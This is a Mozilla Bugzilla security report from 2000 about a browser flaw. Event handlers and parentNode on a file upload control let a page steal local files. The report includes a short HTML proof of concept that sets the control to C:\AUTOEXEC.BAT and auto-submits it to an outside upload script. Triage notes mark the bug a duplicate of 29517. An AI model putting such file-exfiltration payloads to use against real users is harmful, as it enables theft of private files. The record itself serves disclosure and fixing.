Closed Bug 42515 Opened 25 years ago Closed 25 years ago

Stealing files using event handlers and parentNode

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Type:
defect

Tracking

()

Status:
VERIFIED DUPLICATE of bug 29517

People

(Reporter: security-bugs, Assigned: joki)

References

Details

(Whiteboard: [nsbeta2+])

Date: Wed, 14 Jun 2000 18:31:31 +0300 From: Georgi Guninski <joro@nat.bg> To: Mitchell Stoltz <mstoltz@netscape.com> There is a bug in the file upload control, event handlers and parentNode which allows stealing files. The code is: --------------------------------------------------------------------------- <HTML> <TITLE> Reading C:\AUTOEXEC.BAT </TITLE> Reading C:\AUTOEXEC.BAT <BR> Move the mouse over the file control. <BR> <FORM NAME=F enctype="multipart/form-data" ACTION="http://www.nat.bg/~joro/upload2.cgi" METHOD="POST"> <INPUT TYPE=FILE NAME="B1" ID="B1" onmouseover="event.target.parentNode.value='C:\\ AUTOEXEC.BAT';document.forms[0].submit()"> <INPUT TYPE="SUBMIT"> </FORM> </HTML>
Nominating nebeta2.
Status: NEW → ASSIGNED
Keywords: nsbeta2
Target Milestone: --- → M17
I think this is a duplicate of 29517
[nsbeta2+]
Whiteboard: [nsbeta2+]
Tom, Here's another one. Looks like a deriviative of 29517 - or is it? Does your patch for 29517 fix this one?
Assignee: mstoltz → joki
Status: ASSIGNED → NEW
Depends on: 29517
Yes, it does. I'm going to dupe it. The testcase is slightly different but the bug is the same. *** This bug has been marked as a duplicate of 29517 ***
Status: NEW → RESOLVED
Closed: 25 years ago
Resolution: --- → DUPLICATE
Marking Verified as a dup.
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.